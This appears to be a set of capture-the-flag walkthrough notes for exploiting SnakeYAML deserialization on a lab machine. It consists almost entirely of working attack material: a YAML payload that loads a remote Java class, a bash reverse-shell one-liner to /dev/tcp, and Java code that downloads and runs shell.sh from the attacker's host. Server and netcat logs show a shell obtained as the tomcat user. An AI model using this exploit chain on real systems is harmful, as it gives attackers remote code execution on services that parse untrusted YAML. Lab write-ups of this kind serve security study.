https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858 https://github.com/mbechler/marshalsec
yaml:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.15/"]
]]
]
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.227 - - [04/May/2021 22:07:49] code 404, message File not found
10.10.10.227 - - [04/May/2021 22:07:49] "HEAD /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 404 -
# shell.sh
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.14.15/6969 0>&1'
# changes to code
public AwesomeScriptEngineFactory() throws Exception {
try {
Runtime.getRuntime().exec("curl http://10.10.14.15/shell.sh -o /tmp/shell.sh");
Runtime.getRuntime().exec("chmod +x /tmp/shell.sh");
Runtime.getRuntime().exec("./tmp/shell.sh");
} catch (IOException e) {
e.printStackTrace();
}
}
10.10.10.227 - - [04/May/2021 22:54:04] "HEAD /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /artsploit/AwesomeScriptEngineFactory.class HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /shell.sh HTTP/1.1" 200 -
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.227] 34808
bash: cannot set terminal process group (829): Inappropriate ioctl for device
bash: no job control in this shell
whoami;id
whoami;id
tomcat
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)